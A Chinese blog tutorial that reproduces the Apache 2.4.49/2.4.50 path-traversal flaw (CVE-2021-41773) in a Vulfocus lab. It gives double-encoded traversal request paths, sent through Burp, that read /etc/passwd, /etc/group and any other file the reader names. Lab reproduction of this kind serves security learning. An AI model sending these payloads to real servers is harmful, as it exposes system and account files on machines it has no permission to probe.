中间件安全:Apache 目录穿透.(CVE-2021-41773)

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。


目录:

[中间件安全:Apache 目录穿透.(CVE-2021-41773)](#中间件安全:Apache 目录穿透.(CVE-2021-41773))

[Apache 目录穿透:](#Apache 目录穿透:)

[靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客](#靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客)

漏洞测试:

[第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )](#第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. ))

[第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.](#第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.)


Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客


漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )


第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.

复制代码
# 查找存储用户账户信息,包括用户名和用户 ID
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd


# 查找存储组信息,包括组名和组成员
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group


# 如果需要查看别的目录信息,则替换后面的就行.
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径

学习链接:第59天:服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili

相关推荐
老六ip加速器8 分钟前
如何获取静态IP地址?完整教程
网络·网络协议·tcp/ip
佳腾_1 小时前
【Web应用服务器_Tomcat】二、Tomcat 核心配置与集群搭建
java·前端·中间件·tomcat·web应用服务器
小吃饱了3 小时前
LSA六种类型
网络·智能路由器
游王子3 小时前
springboot3 声明式 HTTP 接口
网络·spring boot·网络协议·http
mon_star°3 小时前
搭建基于火灾风险预测与防范的消防安全科普小程序
安全·微信小程序·小程序·微信公众平台
欧先生^_^3 小时前
学习 Apache Kafka
学习·kafka·apache
神经毒素4 小时前
WEB安全--RCE--webshell bypass
网络·安全·web安全
猿周LV4 小时前
网络原理 - 应用层, 传输层(UDP 和 TCP) 进阶, 网络层, 数据链路层 [Java EE]
服务器·网络·网络协议·tcp/ip·udp·java-ee
Zz_waiting.4 小时前
网络原理 - 9
linux·服务器·网络·网络协议·tcp/ip
娃娃略4 小时前
【AI模型学习】双流网络——更强大的网络设计
网络·人工智能·pytorch·python·神经网络·学习